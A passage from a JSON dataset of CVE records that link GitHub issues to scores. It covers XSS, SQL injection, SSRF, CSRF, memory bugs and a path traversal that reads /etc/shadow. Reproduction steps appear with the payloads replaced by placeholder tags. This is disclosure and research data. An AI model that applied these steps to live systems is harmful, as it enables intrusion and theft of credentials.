  65595. "severity": "CRITICAL",
  65596. "baseScore": 9.8,
  65597. "impactScore": 5.9,
  65598. "exploitabilityScore": 3.9
  65599. },
  65600. {
  65601. "CVE_ID": "CVE-2021-29996",
  65602. "Issue_Url_old": "https://github.com/marktext/marktext/issues/2548",
  65603. "Issue_Url_new": "https://github.com/marktext/marktext/issues/2548",
  65604. "Repo_new": "marktext/marktext",
  65605. "Issue_Created_At": "2021-04-04T20:40:31Z",
  65606. "description": "XSS vulnerability could result in RCE CVETAG . Description Cross Site Scripting (XSS) vulnerability that could result in Remote Code Execution (RCE). CVETAG was assigned for this issue. Steps to reproduce NUMBERTAG Create a .md file that contains: APITAG APITAG ` Expected behavior: Language input for the fenced code block should be sanitized before rendered. Actual behavior: HTML stored as language input is not sanitized. Arbitrary javascript code is executed upon rendering. Processes outside of Mark Text could be executed due to APITAG being enabled. Proof of Concept FILETAG Versions Mark Text version NUMBERTAG Operating system: Windows, Linux, APITAG",
  65607. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  65608. "severity": "CRITICAL",
  65609. "baseScore": 9.6,
  65610. "impactScore": 6.0,
  65611. "exploitabilityScore": 2.8
  65612. },
  65613. {
  65614. "CVE_ID": "CVE-2021-30014",
  65615. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1721",
  65616. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1721",
  65617. "Repo_new": "gpac/gpac",
  65618. "Issue_Created_At": "2021-03-29T06:03:15Z",
  65619. "description": "A Integer number overflow in function hevc_parse_slice_segment.. There is a integer overflow in APITAG function hevc_parse_slice_segment. Below code: CODETAG However, function may return a negative number to pps_id, which smaller than NUMBERTAG Results a crash in followed execution. In command Line: FILETAG In gdb: FILETAG The crafted file is in the attached zip: FILETAG",
  65620. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65621. "severity": "MEDIUM",
  65622. "baseScore": 5.5,
  65623. "impactScore": 3.6,
  65624. "exploitabilityScore": 1.8
  65625. },
  65626. {
  65627. "CVE_ID": "CVE-2021-30015",
  65628. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1719",
  65629. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1719",
  65630. "Repo_new": "gpac/gpac",
  65631. "Issue_Created_At": "2021-03-29T05:24:39Z",
  65632. "description": "A Null Pointer Dereference In APITAG There is a Null Pointer Dereference in function APITAG \uff0c The pid comes from function APITAG , the APITAG maybe NULL. Result a crash in APITAG . In command line: FILETAG In gdb: FILETAG The crafted file is in attach zip:",
  65633. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65634. "severity": "MEDIUM",
  65635. "baseScore": 5.5,
  65636. "impactScore": 3.6,
  65637. "exploitabilityScore": 1.8
  65638. },
  65639. {
  65640. "CVE_ID": "CVE-2021-30019",
  65641. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1723",
  65642. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1723",
  65643. "Repo_new": "gpac/gpac",
  65644. "Issue_Created_At": "2021-03-29T07:23:30Z",
  65645. "description": "A integer (heap) overflow in function adts_dmx_process. In APITAG , function APITAG . There is a sub codes like as below: APITAG However, with crafted file, ctx APITAG may be smaller than ctx APITAG So, the size may be a negative number, which results a heap overflow in memcpy. In Command line: gpac info bug6 FILETAG In gdb: FILETAG The crafted file is in the attached zip: FILETAG",
  65646. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65647. "severity": "MEDIUM",
  65648. "baseScore": 5.5,
  65649. "impactScore": 3.6,
  65650. "exploitabilityScore": 1.8
  65651. },
  65652. {
  65653. "CVE_ID": "CVE-2021-3002",
  65654. "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/202",
  65655. "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/202",
  65656. "Repo_new": "seopanel/seo-panel",
  65657. "Issue_Created_At": "2021-01-01T11:31:37Z",
  65658. "description": "FILETAG I'm going to request CVE",
  65659. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  65660. "severity": "MEDIUM",
  65661. "baseScore": 6.1,
  65662. "impactScore": 2.7,
  65663. "exploitabilityScore": 2.8
  65664. },
  65665. {
  65666. "CVE_ID": "CVE-2021-30020",
  65667. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1722",
  65668. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1722",
  65669. "Repo_new": "gpac/gpac",
  65670. "Issue_Created_At": "2021-03-29T06:29:39Z",
  65671. "description": "A stack overflow in function gf_hevc_read_pps_bs_internal. In APITAG , function APITAG . There is a loop as below: ERRORTAG However, with crafted file, pps >num_tile_columns may be larger than sizeof(pps >column_width), which results a stack overflow in the loop. In Command line: FILETAG In gdb: FILETAG The crafted file is in the attached zip: FILETAG",
  65672. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65673. "severity": "MEDIUM",
  65674. "baseScore": 5.5,
  65675. "impactScore": 3.6,
  65676. "exploitabilityScore": 1.8
  65677. },
  65678. {
  65679. "CVE_ID": "CVE-2021-30022",
  65680. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1720",
  65681. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1720",
  65682. "Repo_new": "gpac/gpac",
  65683. "Issue_Created_At": "2021-03-29T05:34:17Z",
  65684. "description": "A Integer Overflow in function gf_avc_read_pps_bs_internal. There is a integer overflow in APITAG , function APITAG . Below code: APITAG pps_id may be a negative number, so will not return. However, avc >pps only has NUMBERTAG unit, so overflow, which results a crash . More than, because of the APITAG , the vuln may lead to an any addr write. In command Line: FILETAG In gdb: FILETAG The crafted file is in the attached zip: FILETAG",
  65685. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65686. "severity": "MEDIUM",
  65687. "baseScore": 5.5,
  65688. "impactScore": 3.6,
  65689. "exploitabilityScore": 1.8
  65690. },
  65691. {
  65692. "CVE_ID": "CVE-2021-30027",
  65693. "Issue_Url_old": "https://github.com/mity/md4c/issues/155",
  65694. "Issue_Url_new": "https://github.com/mity/md4c/issues/155",
  65695. "Repo_new": "mity/md4c",
  65696. "Issue_Created_At": "2021-03-27T18:39:10Z",
  65697. "description": "Use of uninitialized value in the APITAG function. Hi, While fuzzing md4c NUMBERTAG with AFL++ and MSAN, I found out that the APITAG function may use uninitialized memory. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG with memory origin tracking option APITAG ERRORTAG",
  65698. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65699. "severity": "MEDIUM",
  65700. "baseScore": 5.5,
  65701. "impactScore": 3.6,
  65702. "exploitabilityScore": 1.8
  65703. },
  65704. {
  65705. "CVE_ID": "CVE-2021-30030",
  65706. "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/1",
  65707. "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/1",
  65708. "Repo_new": "remoteclinic/remoteclinic",
  65709. "Issue_Created_At": "2021-03-28T13:53:58Z",
  65710. "description": "Cross Site Scripting APITAG XSS) vulnerability in /patients . Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page (patients). Vulnerable Endpoint: URLTAG Step To Reproduce NUMBERTAG Login to Application as a Doctor NUMBERTAG Now got to APITAG Patient\". FILETAG NUMBERTAG Register a Patient Name with below XSS Payload: FILETAG FILETAG NUMBERTAG After Register Patient, go to APITAG FILETAG NUMBERTAG SS Excecuted. FILETAG",
  65711. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  65712. "severity": "MEDIUM",
  65713. "baseScore": 5.4,
  65714. "impactScore": 2.7,
  65715. "exploitabilityScore": 2.3
  65716. },
  65717. {
  65718. "CVE_ID": "CVE-2021-30034",
  65719. "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/5",
  65720. "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/5",
  65721. "Repo_new": "remoteclinic/remoteclinic",
  65722. "Issue_Created_At": "2021-03-29T14:48:24Z",
  65723. "description": "Stored XSS vulnerability in /dashboard. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: URLTAG Step To Reproduce NUMBERTAG Login in Application as a doctor NUMBERTAG Register a patient. FILETAG FILETAG NUMBERTAG After Register a Patient, a page redirect you to \"register report page\". FILETAG NUMBERTAG Here is APITAG field where i inject XSS payload. FILETAG FILETAG NUMBERTAG After Register Report, Click on home. FILETAG NUMBERTAG SS Executed on Dashboard Endpoint. FILETAG",
  65724. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  65725. "severity": "MEDIUM",
  65726. "baseScore": 5.4,
  65727. "impactScore": 2.7,
  65728. "exploitabilityScore": 2.3
  65729. },
  65730. {
  65731. "CVE_ID": "CVE-2021-30039",
  65732. "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/8",
  65733. "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/8",
  65734. "Repo_new": "remoteclinic/remoteclinic",
  65735. "Issue_Created_At": "2021-03-31T11:45:59Z",
  65736. "description": "Stored XSS vulnerability in /patients/ FILETAG APITAG ID}. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: URLTAG (In my case NUMBERTAG is My Patient Report ID). Steps to Reproduce NUMBERTAG Login in Application as Doctor NUMBERTAG Register New Patient. FILETAG FILETAG NUMBERTAG After Register New Patient, a page redirect to Register Report Page, when you scroll down page two fields there APITAG and APITAG Pressure\" where i inject XSS Payload: FILETAG FILETAG NUMBERTAG Now go to home page. FILETAG NUMBERTAG Click on Report which shows on dashboard APITAG FILETAG NUMBERTAG SS Executed on reports.php endpoint. FILETAG",
  65737. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  65738. "severity": "MEDIUM",
  65739. "baseScore": 5.4,
  65740. "impactScore": 2.7,
  65741. "exploitabilityScore": 2.3
  65742. },
  65743. {
  65744. "CVE_ID": "CVE-2021-30042",
  65745. "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/11",
  65746. "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/11",
  65747. "Repo_new": "remoteclinic/remoteclinic",
  65748. "Issue_Created_At": "2021-03-31T17:31:59Z",
  65749. "description": "Stored XSS vulnerability in APITAG ID}. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: URLTAG (in my case NUMBERTAG is Clinic ID). Step To Reproduce NUMBERTAG Login in Application as Doctor NUMBERTAG When you scroll down the main dashboard page, there is clinics options, Click APITAG Clinic\". FILETAG NUMBERTAG Here is four fields vulnerable for XSS APITAG ID} endpoint, APITAG Name\", APITAG Address\", APITAG City\" and APITAG Contact\", Inject XSS Payload in APITAG Name\", APITAG Address\", APITAG City\" and APITAG Contact\". FILETAG FILETAG NUMBERTAG Click on APITAG NUMBERTAG Now Click on APITAG Directory\". FILETAG NUMBERTAG After click on APITAG Directory\", you direct to /clinics/ endpoint where clinics directory show. Click on Clinic where XSS name show. FILETAG NUMBERTAG SS Executed on APITAG ID} endpoint. FILETAG",
  65750. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  65751. "severity": "MEDIUM",
  65752. "baseScore": 5.4,
  65753. "impactScore": 2.7,
  65754. "exploitabilityScore": 2.3
  65755. },
  65756. {
  65757. "CVE_ID": "CVE-2021-30044",
  65758. "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/13",
  65759. "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/13",
  65760. "Repo_new": "remoteclinic/remoteclinic",
  65761. "Issue_Created_At": "2021-04-01T17:27:54Z",
  65762. "description": "Stored XSS vulnerability Site Wide. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: All Endpoints are vulnerable to XSS. Step to Reproduce NUMBERTAG Login in Application as Doctor NUMBERTAG Create New Staff Member. FILETAG NUMBERTAG Put XSS Payload on APITAG Name\" and APITAG Name\" of Staff. Both Fields are vulnerable XSS APITAG Wide). FILETAG FILETAG NUMBERTAG Now Click on Register. FILETAG NUMBERTAG Profile Created. FILETAG NUMBERTAG Now APITAG FILETAG NUMBERTAG Now Login to that Staff account which i created in the name of XSS Payload. FILETAG NUMBERTAG SS Executed on /dashboard/ endpoint because staff member name including APITAG Name\" and APITAG Name\" Both are reflected on all the pages/endpoints. FILETAG > Go to /patients/ endpoint. FILETAG > Go to FILETAG endpoint. FILETAG > Go to FILETAG endpoint. FILETAG I tested all endpoints of APITAG NUMBERTAG all are vulnerable to XSS because of APITAG Name\" and APITAG Name\" of Staff reflected all the pages and some of the endpoints i mentioned in the form of screenshots above.",
  65763. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  65764. "severity": "MEDIUM",
  65765. "baseScore": 5.4,
  65766. "impactScore": 2.7,
  65767. "exploitabilityScore": 2.3
  65768. },
  65769. {
  65770. "CVE_ID": "CVE-2021-30045",
  65771. "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/5975",
  65772. "Issue_Url_new": "https://github.com/serenityos/serenity/issues/5975",
  65773. "Repo_new": "serenityos/serenity",
  65774. "Issue_Created_At": "2021-03-27T13:56:01Z",
  65775. "description": "APITAG Buffer overflow in APITAG Found with APITAG File: FILETAG Trace: ERRORTAG",
  65776. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  65777. "severity": "CRITICAL",
  65778. "baseScore": 9.1,
  65779. "impactScore": 5.2,
  65780. "exploitabilityScore": 3.9
  65781. },
  65782. {
  65783. "CVE_ID": "CVE-2021-30046",
  65784. "Issue_Url_old": "https://github.com/ukoethe/vigra/issues/494",
  65785. "Issue_Url_new": "https://github.com/ukoethe/vigra/issues/494",
  65786. "Repo_new": "ukoethe/vigra",
  65787. "Issue_Created_At": "2021-03-31T09:32:15Z",
  65788. "description": "Segmentation Fault error in APITAG of APITAG Hello, Using hugin APITAG software verdandi adopting vigra, I encountered on the segmentation fault error. ( URLTAG The root cause is assumed to be from Illegal reference by ERRORTAG of debian package > libvigraimpex dev/focal,now NUMBERTAG dfsg NUMBERTAG ubuntu1 The APITAG is assumed to be out of bound without any appropriate check of the valid address dereferenced by scanline. See PATHTAG lines; CODETAG The running command and backtrace is ERRORTAG FILETAG I attached the poc file on this post. Please kindly check the error. Best, Choongin Lee",
  65789. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65790. "severity": "MEDIUM",
  65791. "baseScore": 6.5,
  65792. "impactScore": 3.6,
  65793. "exploitabilityScore": 2.8
  65794. },
  65795. {
  65796. "CVE_ID": "CVE-2021-30048",
  65797. "Issue_Url_old": "https://github.com/201206030/novel-plus/issues/39",
  65798. "Issue_Url_new": "https://github.com/201206030/novel-plus/issues/39",
  65799. "Repo_new": "201206030/novel-plus",
  65800. "Issue_Created_At": "2021-04-06T07:52:39Z",
  65801. "description": "novel plus Arbitrary File Download. Vulnerable code: PATHTAG APITAG = \"/download\") public void APITAG APITAG APITAG APITAG resp) throws Exception { String APITAG = APITAG + APITAG APITAG in = new APITAG APITAG = APITAG \"UTF NUMBERTAG APITAG Disposition\", \"attachment;filename=\" + APITAG APITAG APITAG out = APITAG APITAG b = new byte NUMBERTAG int len NUMBERTAG while ((len = in.read(b NUMBERTAG APITAG NUMBERTAG len); } APITAG APITAG APITAG } Guide: APITAG in to background management NUMBERTAG URLTAG",
  65802. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  65803. "severity": "MEDIUM",
  65804. "baseScore": 5.3,
  65805. "impactScore": 1.4,
  65806. "exploitabilityScore": 3.9
  65807. },
  65808. {
  65809. "CVE_ID": "CVE-2021-30074",
  65810. "Issue_Url_old": "https://github.com/docsifyjs/docsify/issues/1549",
  65811. "Issue_Url_new": "https://github.com/docsifyjs/docsify/issues/1549",
  65812. "Repo_new": "docsifyjs/docsify",
  65813. "Issue_Created_At": "2021-03-31T02:44:15Z",
  65814. "description": "FILETAG NUMBERTAG Cross Site Scripting . APITAG APITAG APITAG APITAG APITAG Bug Report Steps to reproduce NUMBERTAG create a simple docsify project file tree APITAG FILETAG CODETAG FILETAG ERRORTAG FILETAG APITAG NUMBERTAG start a http server FILETAG FILETAG when user search something near XSS payload and the javascript which should rendering as markdown will be execute NUMBERTAG input x in search filed FILETAG What is current behaviour What is the expected behaviour Other relevant information APITAG [ ] Bug does still occur when all/other plugins are disabled? Your OS: Mac OS FILETAG version: APITAG npm/yarn version: Browser version: Docsify version NUMBERTAG Docsify plugins: search.js APITAG Please create a reproducible sandbox FILETAG Mention the docsify version in which this bug was not present (if any)",
  65815. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  65816. "severity": "MEDIUM",
  65817. "baseScore": 6.1,
  65818. "impactScore": 2.7,
  65819. "exploitabilityScore": 2.8
  65820. },
  65821. {
  65822. "CVE_ID": "CVE-2021-30081",
  65823. "Issue_Url_old": "https://github.com/emlog/emlog/issues/74",
  65824. "Issue_Url_new": "https://github.com/emlog/emlog/issues/74",
  65825. "Repo_new": "emlog/emlog",
  65826. "Issue_Created_At": "2021-03-31T16:05:45Z",
  65827. "description": "emlog NUMBERTAG stable has SQL Injection vulnerability. Login Required APITAG in FILETAG line NUMBERTAG ERRORTAG There is no filtering for the pages parameter and passed into the APITAG method. in PATHTAG line NUMBERTAG ERRORTAG obviously, there is an INSERT SQL Injection vulnerability,we can use single quotation marks to close and inject. use burpsuite and sqlmap to verify this vulnerability: APITAG APITAG",
  65828. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  65829. "severity": "HIGH",
  65830. "baseScore": 8.8,
  65831. "impactScore": 5.9,
  65832. "exploitabilityScore": 2.8
  65833. },
  65834. {
  65835. "CVE_ID": "CVE-2021-30082",
  65836. "Issue_Url_old": "https://github.com/dignajar/gris/issues/3",
  65837. "Issue_Url_new": "https://github.com/dignajar/gris/issues/3",
  65838. "Repo_new": "dignajar/gris",
  65839. "Issue_Created_At": "2021-04-01T01:47:16Z",
  65840. "description": "Gris CMS NUMBERTAG has Persistent XSS vulnerability. A xss vulnerability was discovered in Gris CMS NUMBERTAG There is a Persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via admin/dashboard APITAG APITAG",
  65841. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  65842. "severity": "MEDIUM",
  65843. "baseScore": 6.1,
  65844. "impactScore": 2.7,
  65845. "exploitabilityScore": 2.8
  65846. },
  65847. {
  65848. "CVE_ID": "CVE-2021-30083",
  65849. "Issue_Url_old": "https://github.com/WebFairyNet/Mediat/issues/3",
  65850. "Issue_Url_new": "https://github.com/webfairynet/mediat/issues/3",
  65851. "Repo_new": "WebFairyNet/Mediat",
  65852. "Issue_Created_At": "2021-04-01T06:12:22Z",
  65853. "description": "Mediat NUMBERTAG login page exists an XSS vulnerability. FILETAG has XSS via the return parameter. POC: APITAG APITAG",
  65854. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  65855. "severity": "MEDIUM",
  65856. "baseScore": 6.1,
  65857. "impactScore": 2.7,
  65858. "exploitabilityScore": 2.8
  65859. },
  65860. {
  65861. "CVE_ID": "CVE-2021-30108",
  65862. "Issue_Url_old": "https://github.com/liufee/cms/issues/57",
  65863. "Issue_Url_new": "https://github.com/liufee/cms/issues/57",
  65864. "Repo_new": "liufee/cms",
  65865. "Issue_Created_At": "2021-04-01T06:38:09Z",
  65866. "description": "SSRF vulnerability in feehicms NUMBERTAG This is a Server side request forgery vulnerability. We can change HTTP Referer Header to any url, then the server will request it. Details are as follows: We need to send two requests NUMBERTAG First register an account normally, here my account is test NUMBERTAG and the password is NUMBERTAG Log out of our account and log in again from the picture below FILETAG use burpsuite change the http Referer Header, FILETAG The first POC request is as follows CODETAG NUMBERTAG Login with our account and password FILETAG use burpsuite , We don't modify anything The second POC request is as follows CODETAG Then we found that the response packet of the second request contained a NUMBERTAG jump, The jump url is the Referrer header of our first request packet The response of the second request packet is as follows FILETAG NUMBERTAG ulnerability proof FILETAG FILETAG NUMBERTAG how to fix FILETAG",
  65867. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  65868. "severity": "CRITICAL",
  65869. "baseScore": 9.1,
  65870. "impactScore": 5.2,
  65871. "exploitabilityScore": 3.9
  65872. },
  65873. {
  65874. "CVE_ID": "CVE-2021-30111",
  65875. "Issue_Url_old": "https://github.com/0xrayan/CVEs/issues/4",
  65876. "Issue_Url_new": "https://github.com/0xrayan/cves/issues/4",
  65877. "Repo_new": "0xrayan/cves",
  65878. "Issue_Created_At": "2021-04-08T00:48:15Z",
  65879. "description": "CVETAG . Product : Web School ERP NUMBERTAG Description : A stored XSS vulnerability exists in Web School ERP NUMBERTAG ia APITAG Events) in the event name and description fields. An attack can inject a APITAG code that will be stored in the page. If any visitor sees the events, then the payload will be executed.. Recommendation NUMBERTAG Ensure that any user input is properly sanitized NUMBERTAG Use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur POC : Google Drive URLTAG",
  65880. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  65881. "severity": "MEDIUM",
  65882. "baseScore": 5.4,
  65883. "impactScore": 2.7,
  65884. "exploitabilityScore": 2.3
  65885. },
  65886. {
  65887. "CVE_ID": "CVE-2021-30112",
  65888. "Issue_Url_old": "https://github.com/0xrayan/CVEs/issues/3",
  65889. "Issue_Url_new": "https://github.com/0xrayan/cves/issues/3",
  65890. "Repo_new": "0xrayan/cves",
  65891. "Issue_Created_At": "2021-04-08T00:37:35Z",
  65892. "description": "CVETAG . Product : Web School ERP NUMBERTAG Description : Web School ERP NUMBERTAG contains a cross site request forgery (CSRF) vulnerability that allows a remote attacker to create a student_leave_application request through PATHTAG The application fails to validate the CSRF token for a POST request using Guardian privilege. Recommendations NUMBERTAG Implement APITAG and make sure it's validating in back end server as well NUMBERTAG Implement an interceptor which appends token value to every (state changing) request in custom request header APITAG Video POC : Google Drive URLTAG POC : CODETAG",
  65893. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  65894. "severity": "MEDIUM",
  65895. "baseScore": 6.5,
  65896. "impactScore": 3.6,
  65897. "exploitabilityScore": 2.8
  65898. },
  65899. {
  65900. "CVE_ID": "CVE-2021-30113",
  65901. "Issue_Url_old": "https://github.com/0xrayan/CVEs/issues/1",
  65902. "Issue_Url_new": "https://github.com/0xrayan/cves/issues/1",
  65903. "Repo_new": "0xrayan/cves",
  65904. "Issue_Created_At": "2021-04-08T00:19:05Z",
  65905. "description": "CVETAG . Product : Web School ERP NUMBERTAG Description: A blind XSS vulnerability exists in Web School ERP NUMBERTAG ia APITAG Events) in event name filed & description filed. An attacker can inject a APITAG code that will be stored in the page. If any visitor sees the event, then the payload will be executed and sends the victim's information to the attacker website.. Recommendation Ensure that any user input is properly sanitized POC : _As show below it's the output from XSS Hunter Server_ FILETAG FILETAG DOM ERRORTAG",
  65906. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  65907. "severity": "MEDIUM",
  65908. "baseScore": 6.1,
  65909. "impactScore": 2.7,
  65910. "exploitabilityScore": 2.8
  65911. },
  65912. {
  65913. "CVE_ID": "CVE-2021-30114",
  65914. "Issue_Url_old": "https://github.com/0xrayan/CVEs/issues/2",
  65915. "Issue_Url_new": "https://github.com/0xrayan/cves/issues/2",
  65916. "Repo_new": "0xrayan/cves",
  65917. "Issue_Created_At": "2021-04-08T00:29:10Z",
  65918. "description": "CVETAG . Product : Web School ERP NUMBERTAG Description : Web School ERP NUMBERTAG contains a cross site request forgery (CSRF) vulnerability that allows a remote attacker to create a voucher payment request through PATHTAG The application fails to validate the CSRF token for a POST request using admin privilege. Recommendations NUMBERTAG Implement APITAG and make sure it's validating in back end server as well NUMBERTAG Implement an interceptor which appends token value to every (state changing) request in custom request header APITAG Video POC : Google Drive URLTAG POC : ERRORTAG",
  65919. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  65920. "severity": "MEDIUM",
  65921. "baseScore": 6.5,
  65922. "impactScore": 3.6,
  65923. "exploitabilityScore": 2.8
  65924. },
  65925. {
  65926. "CVE_ID": "CVE-2021-3013",
  65927. "Issue_Url_old": "https://github.com/BurntSushi/ripgrep/issues/1773",
  65928. "Issue_Url_new": "https://github.com/burntsushi/ripgrep/issues/1773",
  65929. "Repo_new": "burntsushi/ripgrep",
  65930. "Issue_Created_At": "2021-01-03T09:02:48Z",
  65931. "description": "FILETAG . (As I couldn't find proper contact information to report a vulnerability, I used the email from URLTAG Since I believe this vulnerability can be exploited, I'm not publishing the detail here. MENTIONTAG Can you check the inbox, please?",
  65932. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65933. "severity": "CRITICAL",
  65934. "baseScore": 9.8,
  65935. "impactScore": 5.9,
  65936. "exploitabilityScore": 3.9
  65937. },
  65938. {
  65939. "CVE_ID": "CVE-2021-30141",
  65940. "Issue_Url_old": "https://github.com/friendica/friendica/issues/10110",
  65941. "Issue_Url_new": "https://github.com/friendica/friendica/issues/10110",
  65942. "Repo_new": "friendica/friendica",
  65943. "Issue_Created_At": "2021-04-01T18:23:33Z",
  65944. "description": "An unauthenticated visitor can access a path like PATHTAG FILETAG Expected Result: Access denied error page. Platform Info Friendica Version NUMBERTAG rc Friendica Source: git PHP version NUMBERTAG SQL version: APITAG NUMBERTAG",
  65945. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  65946. "severity": "HIGH",
  65947. "baseScore": 7.5,
  65948. "impactScore": 3.6,
  65949. "exploitabilityScore": 3.9
  65950. },
  65951. {
  65952. "CVE_ID": "CVE-2021-30151",
  65953. "Issue_Url_old": "https://github.com/mperham/sidekiq/issues/4852",
  65954. "Issue_Url_new": "https://github.com/sidekiq/sidekiq/issues/4852",
  65955. "Repo_new": "sidekiq/sidekiq",
  65956. "Issue_Created_At": "2021-03-24T21:56:32Z",
  65957. "description": "Cross site scripting (XSS). Hi there, I found an XSS vulnerability affecting version NUMBERTAG and maybe anything below that. APITAG URLTAG",
  65958. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  65959. "severity": "MEDIUM",
  65960. "baseScore": 6.1,
  65961. "impactScore": 2.7,
  65962. "exploitabilityScore": 2.8
  65963. },
  65964. {
  65965. "CVE_ID": "CVE-2021-3019",
  65966. "Issue_Url_old": "https://github.com/maybe-why-not/lanproxy/issues/1",
  65967. "Issue_Url_new": "https://github.com/maybe-why-not/lanproxy/issues/1",
  65968. "Repo_new": "maybe-why-not/lanproxy",
  65969. "Issue_Created_At": "2021-01-05T02:36:29Z",
  65970. "description": "Path traversal vulnerability in lanproxy leads to connection to the intranet. Vendor of the product: URLTAG Payload: URLTAG Read configuration file FILETAG Configure the proxy to connect to the intranet after logging in with the password FILETAG Read /etc/shadow FILETAG Fingerprint: URLTAG FILETAG",
  65971. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  65972. "severity": "HIGH",
  65973. "baseScore": 7.5,
  65974. "impactScore": 3.6,
  65975. "exploitabilityScore": 3.9
  65976. },
  65977. {
  65978. "CVE_ID": "CVE-2021-30199",
  65979. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1728",
  65980. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1728",
  65981. "Repo_new": "gpac/gpac",
  65982. "Issue_Created_At": "2021-04-02T10:42:56Z",
  65983. "description": "A Null Pointer Dereference In function gf_filter_pck_get_data. In APITAG There is a Null Pointer Dereference, when call APITAG . The first arg pck may be null with a crafted mp4 file. The command line: FILETAG In gdb: FILETAG The crafted file: FILETAG",
  65984. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65985. "severity": "MEDIUM",
  65986. "baseScore": 5.5,
  65987. "impactScore": 3.6,
  65988. "exploitabilityScore": 1.8
  65989. },
  65990. {
  65991. "CVE_ID": "CVE-2021-30209",
  65992. "Issue_Url_old": "https://github.com/textpattern/textpattern/issues/1655",
  65993. "Issue_Url_new": "https://github.com/textpattern/textpattern/issues/1655",
  65994. "Repo_new": "textpattern/textpattern",
  65995. "Issue_Created_At": "2021-03-18T13:11:46Z",
